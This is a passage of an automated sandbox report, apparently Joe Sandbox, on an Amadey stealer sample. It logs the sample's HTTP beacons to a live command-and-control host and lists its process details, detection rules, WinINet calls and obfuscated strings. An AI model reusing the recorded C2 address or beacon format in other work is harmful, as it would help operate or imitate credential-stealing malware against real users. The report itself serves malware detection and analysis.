Sep 26, 2024 22:43:03.319080114 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:43:04.014354944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:43:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	62727	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:43:04.130815029 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:43:04.821232080 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:43:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	62728	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:43:04.829915047 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:43:05.556162119 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:43:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	62729	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:43:05.677907944 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:43:06.386079073 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:43:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Target ID:	0
Start time:	16:40:58
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xfb0000
File size:	1'893'888 bytes
MD5 hash:	897DBB00FC55B959A9210CA4A2E2A86B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2075836324.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2164053615.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:41:05
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0xf0000
File size:	1'893'888 bytes
MD5 hash:	897DBB00FC55B959A9210CA4A2E2A86B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2184665079.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2144388732.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:41:05
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xf0000
File size:	1'893'888 bytes
MD5 hash:	897DBB00FC55B959A9210CA4A2E2A86B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2148075647.0000000005090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2188248851.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:42:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xf0000
File size:	1'893'888 bytes
MD5 hash:	897DBB00FC55B959A9210CA4A2E2A86B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2691462580.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 04FB0C8C Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fe4da8e0298fc43a485162fbcf97386c2780fe8157da8ef19a86cace8ff2b98
Instruction ID: 2e802a5b466bff43403d45d69ce7389747ca27f31aab3405142cdb00cc2a77f8
Opcode Fuzzy Hash: 9fe4da8e0298fc43a485162fbcf97386c2780fe8157da8ef19a86cace8ff2b98
Instruction Fuzzy Hash: 2F1170E730D121BEA14245436F149FB665DE3DB770371842AB887D6042FE94BA4B30F1

Function 04FB0CA8 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 297d098d6aa3ddffba6a905729cda38ee3809a7e9190a56e320b298c16f406d4
Instruction ID: c738f25135d4aaeb220bc691579d01c4a84e38a6b0d6e6f01b7080e2a87a0536
Opcode Fuzzy Hash: 297d098d6aa3ddffba6a905729cda38ee3809a7e9190a56e320b298c16f406d4
Instruction Fuzzy Hash: E011C1E720C121BEA10285432B549FB676DE3DB630331842AF887CA142FE94BA4B70F1

Function 04FB0CFC Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c025108ea5aaae792d0530595511c630d0fd76a6a8dcda6d26b959cfcf50aa2b
Instruction ID: 98b879da9c377cc1ae88ee7e1dff06a0e043a93f6dec9dd99f36d3ed1060f4f4
Opcode Fuzzy Hash: c025108ea5aaae792d0530595511c630d0fd76a6a8dcda6d26b959cfcf50aa2b
Instruction Fuzzy Hash: 4311C6A730D021BDA50284836B149FB6A5DE3DB630331882BF487C5542FE94BA4B30F5

Function 04FB0C93 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02dc8584bc4e5346423665f893eff706f9f597db8c4067c7f46e65c158f1c018
Instruction ID: 377511c311559f3e7e052b9d42dff5e4037b445f6d63431ceeade665003dd0ca
Opcode Fuzzy Hash: 02dc8584bc4e5346423665f893eff706f9f597db8c4067c7f46e65c158f1c018
Instruction Fuzzy Hash: DB11BFF730C021BEA14285836A549FB666DE3DB730331842AF983D6042FE94BA4B71F1

Function 04FB0CC4 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b0145cc5716c85b684fb5a8a2d77467866fc0b7966ad30dee6d001aa67bd7a5
Instruction ID: 57c61206d8198ed61bb789d17aea81b1ee53f91d645f6fc2bc09074ed7821087
Opcode Fuzzy Hash: 4b0145cc5716c85b684fb5a8a2d77467866fc0b7966ad30dee6d001aa67bd7a5
Instruction Fuzzy Hash: 9811A9B730C011BDA54285836B159FB6A5DE3DB670331882AF487D6441FE95BA4B30F1

Function 04FB0CE4 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32727e3fe70b5303ac230fa2a971dbf7dc963de1ebbbf5f1a974f0e2dd84ef07
Instruction ID: ebec8b80582bb703c3fbd10e394c1986921543db2a433b7c3052af583fee5125
Opcode Fuzzy Hash: 32727e3fe70b5303ac230fa2a971dbf7dc963de1ebbbf5f1a974f0e2dd84ef07
Instruction Fuzzy Hash: 5E01D6A720C120BED54245835B049F72A69E7DB671331842AF48786442FE907A4B70F1

Function 04FB0D0B Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 518c1b6930236e34073256fe42cfc0dd2e6ac8cc2a2cf07ad815375ca43f33cd
Instruction ID: bfbf6c4d5f671ceea0c546adec989144b5e2d9206dd3449e9915255981ab3f1e
Opcode Fuzzy Hash: 518c1b6930236e34073256fe42cfc0dd2e6ac8cc2a2cf07ad815375ca43f33cd
Instruction Fuzzy Hash: 51012BB720C010BED54245836A445FB6B65E7DF630330841AF4C7CA542FD54768771F1

Function 04FB0D2C Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028d3e8cf8f0320ce8ac350792bd973cfa752487d5a1036ad542883f1bfe1338
Instruction ID: 63a366c5b8da01bca5e7543f2fa7d266cd40068f26e70ccf4cbad1e9f1cae4e9
Opcode Fuzzy Hash: 028d3e8cf8f0320ce8ac350792bd973cfa752487d5a1036ad542883f1bfe1338
Instruction Fuzzy Hash: EDF0F0A730C021BED28245936A505FB6A59E3DFA30330842AB4C7CA581FE947A8771E5

Function 04FB0D49 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 058302a0a375ea83aa813d1f9f661b973dc3fa99a30ca5a514a6d6b348d35702
Instruction ID: b66168a30be21937abddde917f53e469979f72e515f9bb83f6a7c5f8144a76b1
Opcode Fuzzy Hash: 058302a0a375ea83aa813d1f9f661b973dc3fa99a30ca5a514a6d6b348d35702
Instruction Fuzzy Hash: 68F0556330C120EED14250A32B445FBA685A3EF730330882AF0C3CA181FD90BA8770E1

Function 04FB0D68 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4edad1eeeabac2e2739ceafd0ffa00d3c9a2fdb38ee1c2a2ea99a6f054d9235
Instruction ID: eb0c0e0342478c3822320fcc99305673ceb2bcda0f313a0509a4892465c29fd8
Opcode Fuzzy Hash: a4edad1eeeabac2e2739ceafd0ffa00d3c9a2fdb38ee1c2a2ea99a6f054d9235
Instruction Fuzzy Hash: 0DE0EDA320D120AED14250832B156FB6285A3EF630370892BF5C7CA981FD94799B74E5

Function 04FB0D97 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e8d2f4d3e9de8916861e7e19d3cd17ab4d12a24bbea3f2966ce709f3fef6af5
Instruction ID: c3262fa88583f1656cff10e5c1d7063dc60ecd39d3e6529813bfe5478d225b47
Opcode Fuzzy Hash: 8e8d2f4d3e9de8916861e7e19d3cd17ab4d12a24bbea3f2966ce709f3fef6af5
Instruction Fuzzy Hash: 5BE055B3208010AFE10291537D565F7B389ABAAB20731882AF5C3C7082FDE4640760E0

Function 04FB0D88 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fb10c651b10284c99d96596d0d14edaa9667129ae35c6ddda39ebec1eb233a3
Instruction ID: c32de60d467522e21ae7f5d0e26409f2c8005e678a1cad9e8f3ffcec98dcc835
Opcode Fuzzy Hash: 9fb10c651b10284c99d96596d0d14edaa9667129ae35c6ddda39ebec1eb233a3
Instruction Fuzzy Hash: FEE092B720D021AEA54145836A055FB6289E7EB730331882AF5C7D6042FDA4794770F4

Function 04FB0D75 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 879d8c8096e74d9303135b923235156026a16ad5467209f657f1adf9ceeb62d6
Instruction ID: 1f33994fce78e614ba00e50a00b3750d45fed1c96545b0fea6c1ea2608f6fab1
Opcode Fuzzy Hash: 879d8c8096e74d9303135b923235156026a16ad5467209f657f1adf9ceeb62d6
Instruction Fuzzy Hash: A3F0A07320D120EEE5458A436B449FB6298A7EB730335892AF0C7CB182FD94B95776F4

Function 04FB0DB8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a30fff3dd8b284ead22e03a79d2dc017011df50fb31261496093273c6c125f
Instruction ID: d191abef8ad16c6013dcf994ea04b56091941053023667a451a8de70fac9eac9
Opcode Fuzzy Hash: 01a30fff3dd8b284ead22e03a79d2dc017011df50fb31261496093273c6c125f
Instruction Fuzzy Hash: BEE0CD7360C111AF554150836A055B7614AA7D7731771C42BF5C2CB005FD95A85771F5

Function 04FB0DED Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88670e8f19b0f4c817f70110fe26f3c14414a4f8a08305c00fded4ff3de3ac12
Instruction ID: a2a78ec57d6fae4c2ac7e75b9201a01b1486738f6307f87a7859ade3cf3185e6
Opcode Fuzzy Hash: 88670e8f19b0f4c817f70110fe26f3c14414a4f8a08305c00fded4ff3de3ac12
Instruction Fuzzy Hash: 2DD05B271082515FC74745B114596777F955BC353573541BFF1C2C7442CC5A852B92E1

Function 04FB0DE2 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2165745402.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e161b80c73feb9c744cf9a912073935fb4425924a0ae0681805a8d049b8af607
Instruction ID: 4f3bd0e601945456c9297ed7d13580139c4ca940c5e4c233637d5bd48db7f8ea
Opcode Fuzzy Hash: e161b80c73feb9c744cf9a912073935fb4425924a0ae0681805a8d049b8af607
Instruction Fuzzy Hash: A8D0123731C1109F511691D339162B767819BDA63137984A7E286C7101ECA4E517A1E4

Analysis Process: axplong.exePID: 7620, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.4%
Total number of Nodes:	545
Total number of Limit Nodes:	33

Executed Functions

Function 000FBD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00148D70,00000000,00000000,00000000,00000000), ref: 000FBDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 000FBE11
HttpOpenRequestA.WININET(?,00000000), ref: 000FBE5B
HttpSendRequestA.WININET(?,00000000), ref: 000FBF1B
InternetReadFile.WININET(?,?,000003FF,?), ref: 000FBFCD
InternetCloseHandle.WININET(?), ref: 000FC0A7
InternetCloseHandle.WININET(?), ref: 000FC0AF
InternetCloseHandle.WININET(?), ref: 000FC0B7

Strings

invalid stoi argument, xrefs: 000FE404
stoi argument out of range, xrefs: 000FE3FA
8KG0fymoFx==, xrefs: 000FC2EB, 000FC543
8KG0fCKZFzY=, xrefs: 000FC385
RpKt, xrefs: 000FD516
RHYTYv==, xrefs: 000FBE33

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
API String ID: 688256393-332458646
Opcode ID: 715d4c3450865917eabade52c91e8ca3c083d862171510311c9f96d0a0822f75
Instruction ID: bcd8682cad8bad3bbe6c08dc77c0f83c3f719f8e7522d3e413d9d9be5a846d06
Opcode Fuzzy Hash: 715d4c3450865917eabade52c91e8ca3c083d862171510311c9f96d0a0822f75
Instruction Fuzzy Hash: 25B1E5B1A1011C9BEB24CF28CD89BAEBBB5EF45304F5041A9F608976C2D7749AC4DF94

Function 001046C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00107870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0010795C
Part of subcall function 00107870: __Cnd_destroy_in_situ.LIBCPMT ref: 00107968
Part of subcall function 00107870: __Mtx_destroy_in_situ.LIBCPMT ref: 00107971

Part of subcall function 000FBD60: InternetOpenW.WININET(00148D70,00000000,00000000,00000000,00000000), ref: 000FBDED
Part of subcall function 000FBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 000FBE11
Part of subcall function 000FBD60: HttpOpenRequestA.WININET(?,00000000), ref: 000FBE5B

std::_Xinvalid_argument.LIBCPMT ref: 00104EA2

Strings

stoi argument out of range, xrefs: 00104269, 00104EAC
fed3aa, xrefs: 00105489
aqB6, xrefs: 001054DB
96B6, xrefs: 00105470
Vp 6, xrefs: 00105447
5F6, xrefs: 00105497
MJF+, xrefs: 001047BD, 001048EC, 00104ADC, 00104C0B
MJB+, xrefs: 00104776, 001047ED, 00104A95, 00104B0C
mP=, xrefs: 00106383, 00106652
WJP6, xrefs: 001053A3
Fz==, xrefs: 0010369E, 00104D2D
V0x6, xrefs: 0010541E
aZT6, xrefs: 001053CC
KFT0PL==, xrefs: 001054B9
6F9fr==, xrefs: 00104712
9526, xrefs: 0010531D
V0N6, xrefs: 0010537A
8ZF6, xrefs: 00105502
JB6, xrefs: 001053F5
246122658369, xrefs: 00104F3A, 00104F4D, 00104F8F, 00104F99, 001054F4
9KN6, xrefs: 00105351

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
API String ID: 2414744145-1662704651
Opcode ID: 787ee52a506c164b1f247bf9e63c18034fbca4ec8996022506a95f8dea250bfe
Instruction ID: d955bbe86fd6b3dc3d973020231ff766f57337b0542549675ad15a3984b8e81d
Opcode Fuzzy Hash: 787ee52a506c164b1f247bf9e63c18034fbca4ec8996022506a95f8dea250bfe
Instruction Fuzzy Hash: 25234871E00158CBEB19DB28CD997ADBB72AF91304F5081D8E0886B2C6DBB59F94CF51

Function 000F5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000422, xrefs: 000F5FD9
0000043f, xrefs: 000F603B
00000419, xrefs: 000F5FA8
00000423, xrefs: 000F600A
Keyboard Layout\Preload, xrefs: 000F5F64

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
